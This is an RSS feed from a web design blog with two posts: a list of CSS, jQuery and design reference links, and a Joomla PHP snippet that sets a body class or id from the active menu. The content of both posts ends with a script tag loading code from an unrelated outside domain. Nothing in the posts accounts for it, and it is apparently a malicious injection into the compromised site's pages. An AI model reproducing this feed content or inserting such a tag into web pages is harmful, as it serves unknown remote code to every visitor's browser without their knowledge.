<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Official Design and Development Resource of ThornyRabbit &#187; CSS</title>
	<atom:link href="http://blog.thornyrabbit.com/tag/css/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.thornyrabbit.com</link>
	<description>because we love</description>
	<lastBuildDate>Fri, 19 Mar 2010 16:55:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Useful CSS, Jquery &amp; HTML references</title>
		<link>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/</link>
		<comments>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 15:33:37 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Html]]></category>
		<category><![CDATA[Jquery]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=231</guid>
		<description><![CDATA[I am always finding tutorials or references, but by the time I want to use them I can&#8217;t ever seem to find them.  I am starting this page so I can keep track of them, hopefully this way I will manage to find them again when I need them. Smashing Magazine 50 useful new jquery [...]]]></description>
			<content:encoded><![CDATA[<p>I am always finding tutorials or references, but by the time I want to use them I can&#8217;t ever seem to find them.  I am starting this page so I can keep track of them, hopefully this way I will manage to find them again when I need them.</p>
<p><strong>Smashing Magazine</strong></p>
<ul>
<li><a href="http://www.smashingmagazine.com/2009/08/23/50-useful-new-jquery-techniques/" target="_blank">50 useful new jquery techniques</a></li>
<li><a href="http://www.smashingmagazine.com/2009/01/15/45-new-jquery-techniques-for-a-good-user-experience/" target="_blank">45 new jquery techniques for-a good user experience</a></li>
<li><a href="http://buildinternet.com/2009/11/making-an-interactive-picture-with-jquery/" target="_blank">Making an interactive picture with jquery</a></li>
</ul>
<p><strong>CSS</strong></p>
<ul>
<li><a href="http://css-tricks.com/perfect-full-page-background-image/" target="_blank">Perfect Full Page Background Image</a></li>
</ul>
<p><strong>Design Related</strong></p>
<ul>
<li><a href="http://buildinternet.com/2009/07/fonts-used-in-logos-of-popular-websites/" target="_blank">fonts-used-in-logos-of-popular-websites</a></li>
</ul>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Insert body class name in Joomla</title>
		<link>http://blog.thornyrabbit.com/2009/03/insert-body-class-name-in-joomla/</link>
		<comments>http://blog.thornyrabbit.com/2009/03/insert-body-class-name-in-joomla/#comments</comments>
		<pubDate>Wed, 25 Mar 2009 18:40:56 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Joomla]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=90</guid>
		<description><![CDATA[I recently had to add a class name per section into a body tag for a Joomla based website I have been working on. After quite a bit of google&#8217;ing I found this and it was super useful. To use the menu alias as the class name &#60;?php $menu = &#38;JSite::getMenu(); $active = $menu-&#62;getActive(); ?&#62; [...]]]></description>
			<content:encoded><![CDATA[<p>I recently had to add a class name per section into a body tag for a Joomla based website I have been working on. After quite a bit of google&#8217;ing I found this and it was super useful.</p>
<p><strong>To use the menu alias as the class name</strong></p>
<pre>&lt;?php
$menu = &amp;JSite::getMenu();
$active = $menu-&gt;getActive();
?&gt;
&lt;body id="&lt;?php print $active-&gt;alias; ?&gt;"&gt;</pre>
<p><strong>Use the menu page class suffix</strong></p>
<pre>&lt;?php
$menu =&amp; JSite::getMenu();
$active = $menu-&gt;getActive();
$params = $menu-&gt;getParams( $active-&gt;id );
$class = $params-&gt;get( 'pageclass_sfx' );
?&gt;
&lt;body&lt;?php if ($class) echo ' class="' . $class . '"'; ?&gt;&gt;</pre>
<p><a href="http://forum.joomla.org/viewtopic.php?f=127&amp;t=281999" target="_blank">Visit this site</a> to view the full discussion thread<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/03/insert-body-class-name-in-joomla/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
